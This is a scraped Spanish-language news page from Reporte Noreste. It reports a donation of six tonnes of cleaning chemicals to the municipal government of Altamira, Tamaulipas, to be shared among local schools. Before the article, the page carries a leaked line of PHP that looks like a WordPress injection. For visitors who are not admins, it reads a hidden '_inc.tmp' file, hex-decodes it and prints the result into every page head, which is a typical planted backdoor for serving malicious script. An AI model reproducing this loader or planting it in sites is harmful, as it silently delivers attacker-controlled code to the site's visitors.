if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Recibe Gobierno de Altamira donativo de productos químicos para limpieza – Reporte Noreste
Conéctate con nosotros

Acciones de Gobierno

Recibe Gobierno de Altamira donativo de productos químicos para limpieza

Recibe Gobierno de Altamira donativo de productos químicos para limpieza

IMPORTANTE APOYO QUE SERVIRÁ PARA APOYAR A LAS ESCUELAS DE ESTE MUNICIPIO

Altamira, Tamaulipas.- Gracias a la estrecha relación con el sector empresarial, el gobierno municipal de Altamira que encabeza el Mtro. Armando Martínez Manríquez, recibió la donación de seis toneladas de productos químicos de limpieza, para beneficiar a diversas instituciones educativas.

En este evento, desarrollado en el estacionamiento del complejo administrativo municipal “La Retama”, el jefe edilicio estuvo acompañado de su esposa la C.P. Rossy Luque de Martínez, presidenta del Sistema DIF Altamira, pues será este organismo el encargado de distribuir el apoyo en mención a 40 escuelas de todos los niveles.

“Hoy los empresarios están haciendo sinergia con esta administración municipal porque están viendo los avances que tenemos, ya se está notando que el recurso que se recauda de los impuestos aquí mismo se está invirtiendo y eso incentiva el trabajo en colaboración como el de esta tarde”, destacó Martínez Manríquez.

Como parte del programa, se realizó la entrega simbólica de un vale por un kit de limpieza a cinco planteles educativos como: el CAM Samuel Ramos Magaña; la Escuela Primaria Altamira, el Jardín de Niños “Rubén Ramírez Perlestain”, el Jardín de Niños “María Velázquez Farfán” y el Jardín de Niños “Lázaro Cárdenas”.

Por su parte, la C.P. Rossy Luque agradeció ampliamente al Arq. Eduardo Narrón Garza, representante de la empresa B Clean (Proveedora y Tratadora del Norte S.A. de C.V.) por este significativo apoyo que contribuye a las medidas de cuidado sanitario en las escuelas altamirenses.

Concluyó el evento con la entrega de un reconocimiento a la empresa en mención por parte de las autoridades, contando con la presencia del Lic. Daniel Alberto Marín Castillo, director de Bienestar Social; la Lic. Rosa Elena Martínez Luque, presidenta del Voluntariado Juvenil del Sistema DIF Altamira; la Mtra. María del Carmen Romero Hernández, directora de Educación, entre otros.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Acciones de Gobierno